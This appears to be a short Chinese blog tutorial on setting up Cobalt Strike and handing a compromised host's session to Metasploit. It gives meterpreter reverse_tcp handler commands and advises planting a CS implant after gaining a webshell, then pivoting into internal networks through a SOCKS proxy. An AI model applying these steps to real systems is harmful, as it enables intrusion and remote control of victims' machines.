Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等
CS是分成客户端和服务端的,我们可以在我们的VPS上安装服务端。 但是先要安装 jdk
sudo apt-get install openjdk-8-jdk
将cs 下载好。自己找资源 下载,,给权限。 马赛克是公网VPS的IP。 5555是连接密码。。。kali后台不可以关哈
就在客户端上,直接连接就行了。 隐私。。
一个简单的cs上线
tips:在我们内网渗透的时候哈,拿到webshell了,可以的话直接上cs马,在cs上开socks代理,直接搞内网。舒服的一比。。。
Cobalt Strike → Metasploit
Cobalt Strike获得了一个上线机器,想把这个机器传给Metasploit中的meterpreter,获得一个session进行控制。在Metasploit执行以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #不要用x64的payload
set lhost 192.168.40.129
set lport 63
run -j
之后使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。
然后选中计算机,右键->新增会话,选择Metasploit的监听器:
这个时候可以看到,Metasploit上的监听已经上线,现在可以对meterpreter获得的session进行控制。
手机扫一扫
移动阅读更方便
你可能感兴趣的文章